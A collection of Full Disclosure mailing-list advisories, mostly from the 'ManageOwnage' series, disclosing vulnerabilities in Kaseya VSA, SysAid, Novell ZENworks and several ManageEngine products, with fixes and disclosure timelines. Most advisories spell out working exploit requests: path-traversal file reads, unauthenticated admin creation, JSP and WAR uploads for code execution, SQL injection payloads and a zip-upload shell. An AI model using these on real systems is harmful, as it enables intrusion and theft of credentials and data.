by scraping the page below for "imagename.img" (the fileName parameter
in step 1):
POST /data/getPage.do?method=getPageList=configImgManager
everyPage=1
Sample response:
{"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015
21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceTy
[FD] [CVE-2015-2862/2863 / CERT VU#919604] Kaseya VSA arbitrary file download / open redirect
tl;dr Two vulns in Kaseya Virtual System Administrator - an authenticated arbitrary file download and two lame open redirects. Full advisory text below and at [1]. Thanks to CERT for helping me to disclose these vulnerabilities [2]. Multiple vulnerabilities in Kaseya Virtual System Administrator Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) == Disclosure: 13/07/2015 / Last updated: 13/07/2015 Background on the affected product: Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier to show. Technical details: #1 Vulnerability: Arbitary file download (authenticated) Affected versions: unknown, at least v9 GET /vsaPres/web20/core/Downloader.ashx?displayName=whateverfilepath=../../boot.ini Referer: http://10.0.0.3/ A valid login is needed, and the Referrer header must be included. A sample request can be obtained by downloading any file attached to any ticket, and then modifying it with the appropriate path traversal. This will download the C:\boot.ini file when Kaseya is installed in the default C:\Kaseya directory. The file download root is the WebPages directory (Kaseya_Install_Dir\WebPages\). #2 Vulnerability: Open redirect (unauthenticated) Affected versions: unknown, at least v7 to XXX a) http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com b) GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com Host: www.google.com (host header has to be spoofed to the target) Fix: R9.1: install patch 9.1.0.4 R9.0: install patch 9.0.0.14 R8.0: install patch 8.0.0.18 V7.0: install patch 7.0.0.29 Agile Information Security Limited http://www.agileinfosec.co.uk/ Enabling secure digital business [1] https://raw.githubusercontent.com/pedrib/PoC/master/generic/kaseya-vsa-vuln.txt [2] https://www.kb.cert.org/vuls/id/919604 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] [Multiple CVE's]: various critical vulnerabilities in SysAid Help Desk (RCE, file download, DoS, etc)
Hi,
tl;dr Found lots of vulns in SysAid Help Desk 14.4, including RCE.
SysAid have informed me they all have been fixed in 15.2, but no
re-test was performed.
Full advisory below, and a copy can be obtained at [1].
5 Metasploit modules have been released and currently awaiting merge
in the moderation queue [2].
Regards,
Pedro
[1]:
https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt
[2]:
https://github.com/rapid7/metasploit-framework/pull/5470
https://github.com/rapid7/metasploit-framework/pull/5471
https://github.com/rapid7/metasploit-framework/pull/5472
https://github.com/rapid7/metasploit-framework/pull/5473
https://github.com/rapid7/metasploit-framework/pull/5474
Multiple vulnerabilities in SysAid Help Desk 14.4
Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security
=
Disclosure: 03/06/2015 / Last updated: 03/06/2015
Background on the affected product:
SysAid is an ITSM solution that offers all the essentials, with
everything you need for easy and efficient IT support and effective
help desk operations. Its rich set of features includes a powerful
service desk, asset management and discovery, self-service, and
easy-to-use tools for understanding and optimizing IT performance.
Metasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been
released and should be integrated in the Metasploit framework soon.
All vulnerabilities affect both the Windows and Linux versions unless
otherwise noted.
Technical details:
1)
Vulnerability: Administrator account creation
CVE-2015-2993 (same CVE as #10)
Constraints: none; no authentication or any other information needed
Affected versions: unknown, at least 14.4
GET
/sysaid/createnewaccount?accountID=1337organizationName=sysaiduserName=mr_litpassword=secretmasterPassword=master123
This creates an account with the following credentials: mr_lit:secret
Note that this vulnerability only seems to be exploitable ONCE!
Subsequent attempts to exploit it will fail even if the tomcat server
is restarted.
2)
Vulnerability: File upload via directory traversal (authenticated;
leading to remote code execution)
CVE-2015-2994
Constraints: valid administrator account needed (see #1 to create a
valid admin account)
Affected versions: unknown, at least 14.4
POST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1
Content-Type: multipart/form-data;
boundary=---81351919525780
-81351919525780
Content-Disposition: form-data; name=activation; filename=whatevs.jsp
Content-Type: application/octet-stream
htmlbody%out.println(System.getProperty(os.name));%/bodyhtml
-81351919525780--
The response returns a page which contains the following:
var imageUrl =
icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501;
var thumbUrl =
icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501;
if(imageUrl != null $.trim(imageUrl).length 0)
{
document.getElementById(cropbox).src = imageUrl;
document.getElementById(preview).src = thumbUrl;
parent.glSelectedImageUrl =
icons/user_photo/14222767515000.1049804910604456_temp.jsp;
Go to
http://server/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp
to execute the JSP.
3)
Vulnerability: File upload via directory traversal (unauthenticated;
leading to remote code execution)
CVE-2015-2995
Constraints: no authentication or any other information needed. The
server has to be running Java 7u25 or lower. This is because Java 7u40
(FINALLY!) rejects NULL bytes in file paths. See
http://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more
details.
Affected versions: unknown, at least 14.3 and 14.4
POST /sysaid/rdslogs?rdsName=../../../../sample.war%00
... WAR payload here ...
4)
Vulnerability: Arbitrary file download
CVE-2015-2996 (same CVE as #8)
Constraints: none; no authentication or any other information needed
(see #5 to obtain the traversal path)
Affected versions: unknown, at least 14.4
GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd
5)
Vulnerability: Path disclosure
CVE-2015-2997
Constraints: none; no authentication or any other information needed
Affected versions: unknown, at least 14.4; only works on the Linux version
POST /sysaid/getAgentLogFile?accountId=traversalcomputerId=junk characters
Metasploit PoC:
large_traversal = '../' * rand(15...30)
servlet_path = 'getAgentLogFile'
res = send_request_cgi({
'uri' = normalize_uri(datastore['TARGETURI'], servlet_path),
'method' = 'POST',
'data' =
Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) +
rand(300))),
'ctype' = 'application/octet-stream',
'vars_get' = {
'accountId' = large_traversal +
Rex::Text.rand_text_alphanumeric(8 + rand(10
[FD] [CVE-2015-0779]: Novell ZenWorks Configuration Management remote code execution
Hi, I've found a reported an unrestricted file upload vulnerability in Novell ZenWorks Configuration Management which can be abused to achieve remote code execution. The full advisory text is below, and can also be obtained from my repo [1]. A Metasploit module has been submitted and should hopefully be accepted soon [2]. Regards, Pedro Remote code execution in Novell ZENworks Configuration Management 11.3.1 Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security = Disclosure: 07/04/2015 / Last updated: 07/04/2015 Background on the affected product: Automate and accelerate your Windows 7 migration Microsoft estimates that it can take more than 20 hours to migrate a single machine to Windows 7. Novell ZENworks Configuration Management is ready to dramatically accelerate and automate every aspect of your Windows 7 migration efforts. Boost user productivity Use Novell ZENworks Configuration Management to make sure users always have access to the resources they need regardless of where they work or what devices they use. Eliminate IT effort Automatically enforce policies and dynamically manage resources with identity-based management of users as well as devices. Expand your freedom to choose Manage the lifecycles of all your current and future assets, with full support for Windows and Linux systems, Novell eDirectory, Active Directory, and more. Simplify deployment with virtual appliances Slash deployment times with a convenient virtual appliance deployment option. Enjoy a truly unified solution Centralize the management of all your devices into a single, unified and easy-to-use web-based ZENworks console—called ZENworks Control Center. This vulnerability is present in ZENworks Configuration Management (ZCM) which is part of the ZENworks Suite. A blast from the past? This is a similar vulnerability to ZDI-10-078 / OSVDB-63412, but it abuses a different parameter of the same servlet. However this time Novell: - Did not bother issuing a security advisory to their customers. - Did not credit me even though I did responsible disclosure. - Refused to provide a CVE number for months. - Did not update their ZENworks Suite Trial software with the fix (you can download it now from their site, install and test the PoC / Metasploit module). - Does not list the fix in the ZCM 11.3.2 update information (https://www.novell.com/support/kb/doc.php?id=7015776). Technical details: Vulnerability: Remote code execution via file upload and directory traversal CVE-2015-0779 Constraints: none; no authentication or any other information needed Affected versions: ZENworks Configuration Management 11.3.1 and below POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/filename=payload.war WAR file payload in the body The WAR file will be automatically deployed to the server (on certain Windows and Linux installations the path can be ../webapps/). A Metasploit module that exploits this vulnerability has been released. Fix: Upgrade to version ZENworks Configuration Management 11.3.2. [1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt [2]: https://github.com/rapid7/metasploit-framework/pull/5096 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] [The ManageOwnage Series, part XII]: Multiple vulnerabilities in FailOverServlet (OpManager, AppManager, IT360)
Hi, This is part 12 of the ManageOwnage series. For previous parts, see [1]. This time we have an arbitrary file download, directory content disclosure and blind SQL injection vulnerabilities in ManageEngine OpManager, Applications Manager and IT360. I've pushed two new Metasploit modules into the framework that exploit the file download and the content disclosure [2], these should hopefully be accepted soon. The full advisory text is below, and as always you can get a copy from my repo [3]. Regards, Pedro Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360 Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security == Disclosure: 28/01/2014 / Last updated: 28/01/2014 Background on the affected products: ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation. ManageEngine Applications Manager is a comprehensive application monitoring software used to monitor heterogeneous business applications such as web applications, application servers, web servers, databases, network services, systems, virtual systems, cloud resources, etc. It provides remote business management to the applications or resources in the network. It is a powerful tool for system and network administrators, helping them monitor any number of applications or services running in the network without much manual effort. Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration. Technical details: The affected servlet is the FailOverHelperServlet (affectionately called FailServlet). There are definitely more vulnerabilities than the ones identified below - for example it is possible to hijack the failover operation completely. The ones listed below as the easy ones to find and exploit. #1 Vulnerability: Arbitrary file download CVE-2014-7863 Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360 Affected versions: ManageEngine Applications Manager v? to v11.Y b; ManageEngine OpManager v8 - v11.Y bX; IT360 v? to v10.5 POST /servlet/FailOverHelperServlet?operation=copyfilefileName=C:\\boot.ini #2 Vulnerability: Information disclosure - list all files in a directory and its children CVE-2014-7863 (same as #1) Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360 Affected versions: ManageEngine Applications Manager v? to v11.Y b; ManageEngine OpManager v8 - v11.Y bX; IT360 v? to v10.5 POST /servlet/FailOverHelperServlet?operation=listdirectoryrootDirectory=C:\\ #3 Vulnerability: Blind SQL injection CVE-2014-7864 Affected versions: ManageEngine OpManager v8 - v11.Y bX; IT360 v? to v10.5 Constraints: unauthenticated in OpManager; authenticated in IT360 POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentralcustomerName=[SQLi_1]serverRole=[SQLi_2] POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentralcustomerName=a')%3b+create+table+bacas+(bodas+text)%3b--+serverRole=a Fix: For Applications Manager, upgrade to version 11.9 b11912. For OpManager, install the patch for v11.4 and 11.5: https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet Version 11.6 will be released with the patch. These vulnerabilities remain UNFIXED in IT360. [1] http://seclists.org/fulldisclosure/2014/Aug/55 http://seclists.org/fulldisclosure/2014/Aug/75 http://seclists.org/fulldisclosure/2014/Aug/88 http://seclists.org/fulldisclosure/2014/Sep/1 http://seclists.org/fulldisclosure/2014/Sep/110 http://seclists.org/fulldisclosure/2014/Nov/12 http://seclists.org/fulldisclosure/2014/Nov/18 http://seclists.org/fulldisclosure/2014/Nov/21 http://seclists.org/fulldisclosure/2014/Dec/9 http://seclists.org/fulldisclosure/2015/Jan/2 http://seclists.org/fulldisclosure/2015/Jan/5 [2] https://github.com/rapid7/metasploit-framework/pull/4658 https://github.com/rapid7/metasploit-framework/pull/4659 [3] https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt ___ Sent through
[FD] [The ManageOwnage Series, part IX]: 0-day arbitrary file download in NetFlow Analyzer and IT360
Hi, This is part 9 of the ManageOwnage series. For previous parts see [1]. Today we have yet another 0 day - an arbitrary file download vulnerability that be exploited unauthenticated in NetFlow Analyzer and authenticated in IT360. I'm releasing this as a 0 day because ManageEngine have been making a fool out of me for 105 days. I have asked them are you releasing a fix soon? at least a couple of times every month to which they always responded yes we will release in the next week/month. And then they don't release the fix nor provide an explanation. See the advisory timeline below for details. An Metasploit auxiliary module that exploits this vulnerability has been submitted to the Metasploit Framework Github repo in [2]. A full copy of the advisory below can be obtained from my repo in [3]. Regards, Pedro Arbitrary file download in ManageEngine Netflow Analyzer and IT360 Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security == Disclosure: 30/11/2014 / Last updated: 30/11/2014 Background on the affected product: NetFlow Analyzer, a complete traffic analytics tool, leverages flow technologies to provide real time visibility into the network bandwidth performance. NetFlow Analyzer, primarily a bandwidth monitoring tool, has been optimizing thousands of networks across the World by giving holistic view about their network bandwidth and traffic patterns. NetFlow Analyzer is a unified solution that collects, analyzes and reports about what your network bandwidth is being used for and by whom. Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration. This is being released as a 0-day because ManageEngine have been twiddling their thumbs (and making a fool out of me) for 105 days. See timeline below for explanation. Technical details: Vulnerability: Arbitrary file download Constraints: unauthenticated in NetFlow; authenticated in IT360 Affected versions: NetFlow v8.6 to v9.9; at least IT360 v10.3 and above CVE-2014-5445: GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.inipdf=true CVE-2014-5446 GET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini All 3 servlets can be exploited in both Windows and Linux. A Metasploit module that exploits CVE-2014-5445 has been released. Fix: UNFIXED - ManageEngine failed to take action after 105 days. Timeline of disclosure: 18/08/2014 - Requested contact via ManageEngine Security Response Center. 19/08/2014 - Received contact from the NetFlow Analyzer support team. Responded with the security advisory above detailing the vulnerabilities. - Further back and forth explaining the vulnerabilities, how to exploit them and their impact. 22/08/2014 - Requested information regarding the release date for the fix. Received response We do not have a ETA on this, I will check with our engineering team and update you. 22/09/2014 - Requested information regarding the release date for the fix. Received response We expect that the new release will be within the next couple of weeks. 20/10/2014 - Requested information regarding the release date for the fix. Received response Our new release will be happening early by next week, you can get the update in our NetFlow Analyzer website. - Asked if they are sure that the fix will be included in the new release. Received response yes you are correct, the issue that you have specified is fixed in new release. 27/10/2014 - NetFlow Analyzer version 10.2 released - still vulnerable. - Sent an email to ManageEngine asking if they are going to release a fix soon. Received response We will release the PPM file of the upgrade soon, in which we have fixed the Vulnerability you mentioned. 5/11/2014 - Requested information regarding the release date for the fix. Received response You can expect the release before this month end. 28/11/2014 - Requested information regarding the release date for the fix. Received response The PPM file is in testing phase and will be released in next Month. - Asked if they can commit to a date. Received response the ppm is in testing phase now, as it is one of the major release, we will not be able to give an exact date of release. 30/11/2014 - Realised that ManageEngine have been playing me for 105 days, and immediately released advisory and exploit. [1] http://seclists.org/fulldisclosure/2014/Aug/55 http://seclists.org/fulldisclosure/2014/Aug/75 http://seclists.org/fulldisclosure/2014/Aug/88 http
Re: [FD] [The ManageOwnage Series, part IX]: 0-day arbitrary file download in NetFlow Analyzer and IT360
On 30 Nov 2014 00:17, Pedro Ribeiro ped...@gmail.com wrote: Hi, This is part 9 of the ManageOwnage series. For previous parts see [1]. Technical details: Vulnerability: Arbitrary file download Constraints: unauthenticated in NetFlow; authenticated in IT360 Affected versions: NetFlow v8.6 to v9.9; at least IT360 v10.3 and above CVE-2014-5445: GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.inipdf=true CVE-2014-5446 GET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini A small correction: the NetFlow vulnerable versions are actually v8.6 to v10.2 (which is the latest release). I've updated the advisory in the repo. Regards Pedro ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] [The ManageOwnage Series, part VII]: Super admin privesc + password DB dump in Password Manager Pro
Hi, This is part 7 of the ManageOwnage series. For previous parts, see [1]. Today we have a blind SQL injection in Password Manager Pro (PMP) that can be abused to escalate privileges for a low privileged user (like a guest) to the super administrator. Using our new powers we can then dump the whole password database in cleartext. Unlike in part 6, this time ManageEngine have been responsible and released an update. It actually took them less than a month to fix it - so props to the PMP development team. I have also produces a Metasploit module that performs the injection, escalates privileges and dumps the password database. It has been proposed for merging and hopefully should be integrated in the next few days: https://github.com/rapid7/metasploit-framework/pull/4155 Details and full advisory text is below. A copy of this advisory can be obtained from my repo [2]. Regards, Pedro Authenticated blind SQL injection in Password Manager Pro / Pro MSP Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security == Disclosure: 08/11/2014 / Last updated: 08/11/2014 Background on the affected products: Password Manager Pro (PMP) is a secure vault for storing and managing shared sensitive information such as passwords, documents and digital identities of enterprises. Technical details: PMP has a SQL injection vulnerability in its search function. A valid user account is required to exploit the injection, however a low privileged guest account is enough. The application uses different database backends by default depending on its version: versions 6.8 use the MySQL backend and versions = 6.8 use PostgreSQL. Single quotes are escaped with backslashes at the injection point, but this can be somewhat avoided by double escaping the slashes (\\'). In addition, injected strings are all modified to uppercase. These two unintended protections make it difficult to exploit the injection to achieve remote code execution. However the injection can be abused in creative ways - for example to escalate the current user privileges to Super Administrator, which has access to all the passwords in the system in unencrypted format. This can be achieved by injecting the following queries: update AaaAuthorizedRole set role_id=1 where account_id=userId;insert into ptrx_superadmin values (userId,true);. A Metasploit module has been released that creates a new Super Administrator account and exports PMP's password database in CSV format. All passwords are exported unencrypted. Vulnerability: Blind SQL injection in SEARCH_ALL parameter (multiple pages affected) Constraints: authentication needed (guest / low privileged user account) CVE-2014-8498 POST /BulkEditSearchResult.cc Affected versions: Unknown, at least v7 build 7001 to vX build XXX CVE-2014-8499 POST /SQLAdvancedALSearchResult.cc POST /AdvancedSearchResult.cc Affected versions: Unknown, at least v6.5 to vX build XXX COUNT=1USERID=1SEARCH_ALL=injection here Fix: Upgrade to version 7.1 build 7105 [1] http://seclists.org/fulldisclosure/2014/Aug/55 http://seclists.org/fulldisclosure/2014/Aug/75 http://seclists.org/fulldisclosure/2014/Aug/88 http://seclists.org/fulldisclosure/2014/Sep/1 http://seclists.org/fulldisclosure/2014/Sep/110 http://seclists.org/fulldisclosure/2014/Nov/12 [2] https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Mogwai Security Advisory MSA-2014-01: ManageEngine EventLog Analyzer Multiple Vulnerabilities
On 3 September 2014 07:23, Pedro Ribeiro ped...@gmail.com wrote: On 31 August 2014 16:39, Advisories advisor...@mogwaisecurity.de wrote: Mogwai Security Advisory MSA-2014-01 -- Title: ManageEngine EventLog Analyzer Multiple Vulnerabilities Product:ManageEngine EventLog Analyzer Affected versions: EventLog Analyzer 9.9 (Build 9002) on Windows/Linux Impact: critical Remote: yes Product link: http://www.manageengine.com/products/eventlog/ Reported: 18/04/2013 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: -- EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of machine generated logs by collecting, analyzing, searching, reporting, and archiving from one central location. This event log analyzer software helps to mitigate internal threats, conduct log forensics analysis, monitor privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, regulatory compliance reports, historical trend reports, and more. Business recommendation: -- During a penetration test, multiple vulnerabilities have been identified that are based on severe design/implementation flaws in the application. It is highly recommended not to use this software until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability description: -- 1) Unauthenticated remote code execution ME EventLog Analyzer contains a agentUpload servlet which is used by Agents to send log data as zip files to the central server. Files can be uploaded without authentication and are stored/decompressed in the data subdirectory. As the decompress procedure is handling the file names in the ZIP file in a insecure way it is possible to store files in the web root of server. This can be used to upload/execute code with the rights of the application server. 2) Authorization issues The EventLog Analyzer web interface does not check if an authenticated has sufficient permissions to access certain parts of the application. A low privileged user (for example guest) can therefore access critical sections of the web interface, by directly calling the corresponding URLs. This can be used to access the database browser of the application which gives the attacker full access to the database. Proof of concept: -- 1) Unauthenticated remote code execution - Create a malicious zip archive with the help of evilarc[1] evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp - Send the malicious archive to the agentUpload servlet curl -F payload=@evil.zip http://172.16.37.131:8400/agentUpload - Enjoy your shell http://172.16.37.131:8400/cmdshell.jsp A working Metasploit module will be released next week. 2) Authorization issues - Log in as a low privileged user (for example guest/guest) - Directly call the URL of the database browser http://xxx.xxx.xxx.xxx:8400/event/runQuery.do Vulnerable / tested versions: -- EventLog Analyzer 8.2 (Build 8020) (Windows) EventLog Analyzer 8.2 (Build 8020) (Linux) EventLog Analyzer 9.0 (Build 9002) (Windows) EventLog Analyzer 9.0 (Build 9002) (Linux) Other versions might also be vulnerable. Disclosure timeline: -- 14/04/2013: Vulnerability discovery 18/04/2013: Informed vendor via ManageEngine Security Response Center (MESRC) Form 23/04/2013: Second try to contact MESRC, as we didn't receive any response from the first try. 23/04/2013: Response from vendor, they wait on some feedback from the development team 10/05/2013: Response from vendor, saying that this is rather a issue than a vulnerability, will fix it anyway 13/05/2013: Technical details including a working proof of concept send ManageEngine. 13/05/2013: Vendor response, say that they forward it to the development team 24/05/2013: Vendor response, saying that they will fix it in 2013 as they are tightly scheduled on other priorities 24/05/2013: Response from us, asking if we will be informed when the vulnerability is fixed 28/05/2013: Response from ManageEngine, saying that we must subscribe to their newsletter for release
Re: [FD] Mogwai Security Advisory MSA-2014-01: ManageEngine EventLog Analyzer Multiple Vulnerabilities
On 31 August 2014 16:39, Advisories advisor...@mogwaisecurity.de wrote: Mogwai Security Advisory MSA-2014-01 -- Title: ManageEngine EventLog Analyzer Multiple Vulnerabilities Product:ManageEngine EventLog Analyzer Affected versions: EventLog Analyzer 9.9 (Build 9002) on Windows/Linux Impact: critical Remote: yes Product link: http://www.manageengine.com/products/eventlog/ Reported: 18/04/2013 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: -- EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of machine generated logs by collecting, analyzing, searching, reporting, and archiving from one central location. This event log analyzer software helps to mitigate internal threats, conduct log forensics analysis, monitor privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, regulatory compliance reports, historical trend reports, and more. Business recommendation: -- During a penetration test, multiple vulnerabilities have been identified that are based on severe design/implementation flaws in the application. It is highly recommended not to use this software until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability description: -- 1) Unauthenticated remote code execution ME EventLog Analyzer contains a agentUpload servlet which is used by Agents to send log data as zip files to the central server. Files can be uploaded without authentication and are stored/decompressed in the data subdirectory. As the decompress procedure is handling the file names in the ZIP file in a insecure way it is possible to store files in the web root of server. This can be used to upload/execute code with the rights of the application server. 2) Authorization issues The EventLog Analyzer web interface does not check if an authenticated has sufficient permissions to access certain parts of the application. A low privileged user (for example guest) can therefore access critical sections of the web interface, by directly calling the corresponding URLs. This can be used to access the database browser of the application which gives the attacker full access to the database. Proof of concept: -- 1) Unauthenticated remote code execution - Create a malicious zip archive with the help of evilarc[1] evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp - Send the malicious archive to the agentUpload servlet curl -F payload=@evil.zip http://172.16.37.131:8400/agentUpload - Enjoy your shell http://172.16.37.131:8400/cmdshell.jsp A working Metasploit module will be released next week. 2) Authorization issues - Log in as a low privileged user (for example guest/guest) - Directly call the URL of the database browser http://xxx.xxx.xxx.xxx:8400/event/runQuery.do Vulnerable / tested versions: -- EventLog Analyzer 8.2 (Build 8020) (Windows) EventLog Analyzer 8.2 (Build 8020) (Linux) EventLog Analyzer 9.0 (Build 9002) (Windows) EventLog Analyzer 9.0 (Build 9002) (Linux) Other versions might also be vulnerable. Disclosure timeline: -- 14/04/2013: Vulnerability discovery 18/04/2013: Informed vendor via ManageEngine Security Response Center (MESRC) Form 23/04/2013: Second try to contact MESRC, as we didn't receive any response from the first try. 23/04/2013: Response from vendor, they wait on some feedback from the development team 10/05/2013: Response from vendor, saying that this is rather a issue than a vulnerability, will fix it anyway 13/05/2013: Technical details including a working proof of concept send ManageEngine. 13/05/2013: Vendor response, say that they forward it to the development team 24/05/2013: Vendor response, saying that they will fix it in 2013 as they are tightly scheduled on other priorities 24/05/2013: Response from us, asking if we will be informed when the vulnerability is fixed 28/05/2013: Response from ManageEngine, saying that we must subscribe to their newsletter for release information 05/09/2013: Verification that exploit is still working
[FD] [The ManageOwnage Series, part IV]: RCE / file upload in Eventlog Analyzer, feat. special guests h0ng10 and Mogwai Security
Hi all, h0ng10 from Mogway Security has found a file upload leading to RCE in Eventlog Analyzer (see advisory below for a snippet or go to http://seclists.org/fulldisclosure/2014/Aug/86). h0ng10 communicated this over a year ago to ManageEngine but they failed to fix it. When I found and communicated the same vulnerability to ManageEngine a week ago, they accepted my report as valid and said they would look into it. There was no mention of h0ng10's previous discovery, so I don't know what they did with it - perhaps they lost or misplaced it? Anyway, I had an exploit ready for when they fixed it, but since it's the vulnerability information is out, I'm releasing the exploit today. The exploit credit's h0ng10 as the original vulnerability discoverer and can be found at: https://github.com/rapid7/metasploit-framework/pull/3732 This will hopefully be integrated in Metasploit soon. The exploit has been thoroughly tested in many Windows and Linux versions. Thanks to h0ng10 and Mogwai Security for featuring in the ManageOwnage Series! Regards, Pedro On 31 August 2014 16:39, Advisories advisor...@mogwaisecurity.de wrote: Mogwai Security Advisory MSA-2014-01 -- Title: ManageEngine EventLog Analyzer Multiple Vulnerabilities Product:ManageEngine EventLog Analyzer Affected versions: EventLog Analyzer 9.9 (Build 9002) on Windows/Linux Impact: critical Remote: yes Product link: http://www.manageengine.com/products/eventlog/ Reported: 18/04/2013 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vulnerability description: -- 1) Unauthenticated remote code execution ME EventLog Analyzer contains a agentUpload servlet which is used by Agents to send log data as zip files to the central server. Files can be uploaded without authentication and are stored/decompressed in the data subdirectory. As the decompress procedure is handling the file names in the ZIP file in a insecure way it is possible to store files in the web root of server. This can be used to upload/execute code with the rights of the application server. Proof of concept: -- 1) Unauthenticated remote code execution - Create a malicious zip archive with the help of evilarc[1] evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp - Send the malicious archive to the agentUpload servlet curl -F payload=@evil.zip http://172.16.37.131:8400/agentUpload - Enjoy your shell http://172.16.37.131:8400/cmdshell.jsp A working Metasploit module will be released next week. -- Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) i...@mogwaisecurity.de ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] [The ManageOwnage Series, part III]: Multiple vulnerabilities / RCE in ManageEngine Desktop Central
Hi, This is the 3rd part of the ManageOwnage series. For previous chapters see: http://seclists.org/fulldisclosure/2014/Aug/55 http://seclists.org/fulldisclosure/2014/Aug/75 tl;dr CVE-2014-5005, 5006 and 5007 - RCE via file upload in Desktop Central Metasploit module will be released soon. A copy of the advisory below is available in my repo at https://raw.githubusercontent.com/pedrib/PoC/master/me_dc9_file_upload.txt Regards, Pedro Arbitrary file upload / remote code execution in ManageEngine Desktop Central / Desktop Central MSP Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security = Background on the affected product: Desktop Central is an integrated desktop mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more. There are several vulnerable servers are out there if you know the Google dorks. Quoting the author of the Internet Census 2012: As a rule of thumb, if you believe that nobody would connect that to the Internet, really nobody, there are at least 1000 people who did. These vulnerabilities can be abused to achieve remote code execution as SYSTEM in Windows. I've updated the desktopcentral_file_upload Metasploit module to use the new statusUpdate technique. Needless to say, owning a Desktop Central box will give you control of all the computers and smartphones it manages. Technical details: #1 Vulnerability: Remote code execution as SYSTEM via file upload (unauthenticated) Constraints: none; no authentication or any other information needed a) CVE-2014-5005 Affected versions: all versions from v7 to v9 build 90054 Fix: Upgrade to DC v9 build 90055 POST 